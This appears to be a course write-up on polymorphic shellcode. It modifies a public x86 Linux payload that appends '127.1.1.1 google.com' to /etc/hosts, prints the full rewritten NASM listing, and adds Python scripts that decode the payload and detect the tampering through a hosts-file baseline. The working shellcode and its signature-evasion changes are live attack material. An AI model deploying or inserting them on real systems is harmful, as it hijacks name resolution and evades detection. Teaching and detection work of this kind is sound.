6_2 - ADDING ENTRIES TO "/ETC/HOSTS" FILE
- The same concepts studied in 6_1 apply in this case.
2 - MODIFYING A SHELLCODE
- The original program to be modified in this exercise adds a new entry to the hosts file that resolves google.com to 127.1.1.1:
http://shell-storm.org/shellcode/files/shellcode-893.php
- Let's see 3 possible modifications:
a) Based on the fact that any number AND-ed with itself is the same number, the junk instruction "and edx,edx" is introduced; its effect on the functionality of the program is null:
https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29
b) Instead of pushing the "/etc///hosts" characters directly onto the stack, they are written below esp in 4-byte chunks and esp is then lowered to point at them (the store at the largest offset, esp-12, becomes the start of the string):
mov dword [esp-4],0x7374736f ; "osts"  - instead of pushing,
mov dword [esp-8],0x682f2f2f ; "///h"  - "/etc///hosts" is stored
mov dword [esp-12],0x6374652f ; "/etc"  - below esp in 4-byte chunks...
sub esp,0xc ; ...and esp is moved down 12 bytes to point at it
c) Finally, instead of using the stack (push/pop) to load values into registers, the "mov" instruction is used. This method is used for write(20), close(6) and exit(1):
;push 20
;pop edx
mov dl,0x14 ; edx = 20, the byte count passed to the write syscall
int 0x80
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80
;push 0x1
;pop eax
mov al,0x1 ; identifier (1) for exit syscall is moved to al
int 0x80
- The assembly program that results from applying these modifications is A6_2.nasm:
global _start
section .text
_start:
and edx,edx ; junk instruction: AND-ing a register with itself leaves it unchanged
xor ecx, ecx ; ecx = 0
mul ecx ; eax = edx = 0 (eax * 0)
mov al, 0x5 ; identifier (5) for open syscall is moved to al
push ecx ; NUL terminator for the pathname
;push 0x7374736f ;/etc///hosts
;push 0x682f2f2f
;push 0x6374652f
mov dword [esp-4],0x7374736f ; "osts"  - instead of pushing,
mov dword [esp-8],0x682f2f2f ; "///h"  - "/etc///hosts" is stored
mov dword [esp-12],0x6374652f ; "/etc"  - below esp in 4-byte chunks...
sub esp,0xc ; ...and esp is moved down 12 bytes to point at it
mov ebx, esp ; ebx = pathname
mov cx, 0x401 ; flags = O_WRONLY | O_APPEND
int 0x80 ; open("/etc///hosts", O_WRONLY|O_APPEND)
xchg eax, ebx ; ebx = file descriptor returned by open
push 0x4
pop eax ; identifier (4) for write syscall
jmp short _load_data
_write:
pop ecx ; ecx = address of the data string (pushed by call _write)
;push 20
;pop edx
mov dl,0x14 ; edx = 20, the byte count passed to the write syscall
int 0x80 ; write(fd, "127.1.1.1 google.com", 20)
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80 ; close(fd)
;push 0x1
;pop eax
mov al,0x1 ; identifier (1) for exit syscall is moved to al
int 0x80 ; exit
_load_data:
call _write ; pushes the address of the string below as the return address
google db "127.1.1.1 google.com"
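Modifications b) and c) change how the same bytes and syscall numbers reach the stack and the registers, not what the program does. The analysis script below is an added example (Python, not code from the original page or from the shellcode's author) that reads a copy of the listing above as text and recovers the two things an analyst wants from it: the string assembled at esp, decoded from either the original "push imm32" form or the "mov dword [esp-N], imm32" form, and the syscall number in eax at every "int 0x80", by tracking eax/ebx/ecx/edx only where their values are statically known. The listing copy, the syscall table and the register-tracking rules are assumptions of this example; the linear walk is enough only because the jmp/call pair in this listing exists to obtain the data string's address.

```python
import re
import struct

# 32-bit x86 Linux syscall numbers used by the listing on this page.
X86_SYSCALLS = {1: "exit", 4: "write", 5: "open", 6: "close"}

# Constructed copy of the A6_2.nasm listing above (comments dropped), used as input.
LISTING = """\
_start:
and edx,edx
xor ecx, ecx
mul ecx
mov al, 0x5
push ecx
mov dword [esp-4],0x7374736f
mov dword [esp-8],0x682f2f2f
mov dword [esp-12],0x6374652f
sub esp,0xc
mov ebx, esp
mov cx, 0x401
int 0x80
xchg eax, ebx
push 0x4
pop eax
jmp short _load_data
_write:
pop ecx
mov dl,0x14
int 0x80
mov al,0x6
int 0x80
mov al,0x1
int 0x80
_load_data:
call _write
google db "127.1.1.1 google.com"
"""
# The three pushes that modification b) replaced (shown commented out on the page).
ORIGINAL_PUSHES = "push 0x7374736f\npush 0x682f2f2f\npush 0x6374652f\n"

FULL = {"eax", "ebx", "ecx", "edx"}
SUB = {"al": ("eax", 8), "bl": ("ebx", 8), "cl": ("ecx", 8), "dl": ("edx", 8),
       "ax": ("eax", 16), "bx": ("ebx", 16), "cx": ("ecx", 16), "dx": ("edx", 16)}


def _instructions(listing):
    """Yield (mnemonic, operands) per line, dropping comments, labels and blanks."""
    for line in listing.splitlines():
        text = line.split(";", 1)[0].strip()
        if text and not text.endswith(":"):
            parts = re.split(r"[\s,]+", text)
            yield parts[0], parts[1:]


def _printable_dword(imm):
    """Little-endian bytes of imm if all four are printable ASCII, else None."""
    raw = struct.pack("<I", imm)
    return raw if all(0x20 <= b < 0x7F for b in raw) else None


def decode_stack_string(listing):
    """Rebuild the ASCII string assembled at esp from either form on the page:
    'push imm32' (the first push lands at the highest address) or
    'mov dword [esp-N], imm32' (a larger N means a lower address)."""
    pushes, stores = [], []
    for op, args in _instructions(listing):
        if op == "push" and args and args[0].startswith("0x"):
            pushes.append(int(args[0], 16))
        elif op == "mov" and len(args) == 3 and args[1].startswith("[esp-"):
            stores.append((int(args[1][5:-1]), int(args[2], 16)))
    ordered = [imm for _, imm in sorted(stores, reverse=True)] + pushes[::-1]
    chunks = [c for c in map(_printable_dword, ordered) if c is not None]
    return b"".join(chunks).decode("ascii")


def trace_syscalls(listing):
    """Report (number, name) for eax at each 'int 0x80'; registers whose value
    cannot be known statically are tracked as None."""
    regs = dict.fromkeys(FULL)
    pending = None  # value of the most recent push, consumed by the next pop
    calls = []
    for op, args in _instructions(listing):
        dst = args[0] if args else ""
        if op == "int" and dst == "0x80":
            calls.append((regs["eax"], X86_SYSCALLS.get(regs["eax"], "?")))
        elif op == "xor" and len(args) == 2 and dst == args[1] and dst in FULL:
            regs[dst] = 0
        elif op == "mul" and dst in FULL:
            zero = regs[dst] == 0 or regs["eax"] == 0  # anything * 0 == 0
            regs["eax"] = regs["edx"] = 0 if zero else None
        elif op == "push":
            pending = regs[dst] if dst in FULL else (int(dst, 16) if dst.startswith("0x") else None)
        elif op == "pop" and dst in FULL:
            regs[dst], pending = pending, None
        elif op == "xchg" and dst in FULL and args[1] in FULL:
            regs[dst], regs[args[1]] = regs[args[1]], regs[dst]
        elif op == "mov" and dst in SUB and args[1].startswith("0x"):
            full, width = SUB[dst]
            mask = (1 << width) - 1
            if regs[full] is not None:  # the untouched upper bytes must be known too
                regs[full] = (regs[full] & ~mask) | (int(args[1], 16) & mask)
        elif op == "mov" and dst in FULL and args[1].startswith("0x"):
            regs[dst] = int(args[1], 16)
        elif dst in FULL or dst in SUB:
            regs[SUB.get(dst, (dst,))[0]] = None  # any other write: value unknown
    return calls
```

Running decode_stack_string on both LISTING and ORIGINAL_PUSHES yields "/etc///hosts", which is the concrete check that modification b) preserved the pathname byte for byte; trace_syscalls(LISTING) yields open, write, close, exit in that order, the same sequence a signature written against the push/pop form would be looking for.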
3 - TESTING POLYMORPHISM
- Assembling and linking A6_2.nasm:
- Extracting the shellcode:
- Inserting the shellcode into the ShellcodeTest.c program:
- Compiling ShellcodeTest.c:
- Executing the compiled ShellcodeTest.c:
- The result is the same as with the original program: a new entry is created in the "/etc/hosts" file, resolving google.com to 127.1.1.1:
- While the original shellcode was 77 bytes, the new one is 88 bytes, an increase of 14%.
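Since the only lasting effect of either version of the shellcode is the appended line in "/etc/hosts", a defender's check that is independent of which byte pattern the code uses is an integrity comparison of the hosts file itself. The script below is an added example (Python, not part of the original page): it parses constructed hosts-file content, compares each (ip, name) pair against a constructed known-good baseline, and singles out the case this payload produces, a public-looking FQDN resolving to a loopback address. It also handles the edge case that follows from the 20-byte payload carrying no trailing newline: if the file had lacked a final newline, the entry would merge into the previous line, where a regex for a line starting with "127.1.1.1" would miss it but the baseline comparison still does not.

```python
import ipaddress

# Constructed baseline hosts file, and the same file after the shellcode on this
# page appended its 20-byte payload (which carries no trailing newline).
HOSTS_BASELINE = (
    "127.0.0.1 localhost\n"
    "127.0.1.1 workstation\n"
    "# IPv6\n"
    "::1 ip6-localhost ip6-loopback\n"
)
HOSTS_AFTER = HOSTS_BASELINE + "127.1.1.1 google.com"
# Constructed variant: had the file lacked a final newline, the payload would
# merge into the previous line instead of starting a new one.
HOSTS_GLUED = HOSTS_BASELINE.rstrip("\n") + "127.1.1.1 google.com"

# Known-good (ip, name) pairs, e.g. recorded at provisioning time (constructed).
BASELINE = {("127.0.0.1", "localhost"), ("127.0.1.1", "workstation"),
            ("::1", "ip6-localhost"), ("::1", "ip6-loopback")}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Return (line number, ip, name) triples; ip is None for unparseable lines
    so a malformed entry is surfaced rather than silently dropped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        body = line.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            entries.append((lineno, None, body))
            continue
        for name in fields[1:]:
            entries.append((lineno, ip, name.lower()))
    return entries


def suspicious_entries(text, baseline):
    """Flag every hosts entry outside the baseline, naming the case that matters
    most for this payload: a dotted (public-looking) name pinned to loopback."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if ip is None:
            findings.append((lineno, "unparseable line", name))
        elif (str(ip), name) in baseline:
            continue
        elif ip.is_loopback and "." in name and name not in LOCAL_NAMES:
            findings.append((lineno, "fqdn pinned to loopback", f"{ip} {name}"))
        else:
            findings.append((lineno, "not in baseline", f"{ip} {name}"))
    return findings
```

On HOSTS_AFTER the check reports line 5, "127.1.1.1 google.com", as an FQDN pinned to loopback; on HOSTS_GLUED the merged line is still reported because "google.com" is not a baseline name for "::1". In practice the baseline would be taken from a known-good copy of the host's own file rather than written inline.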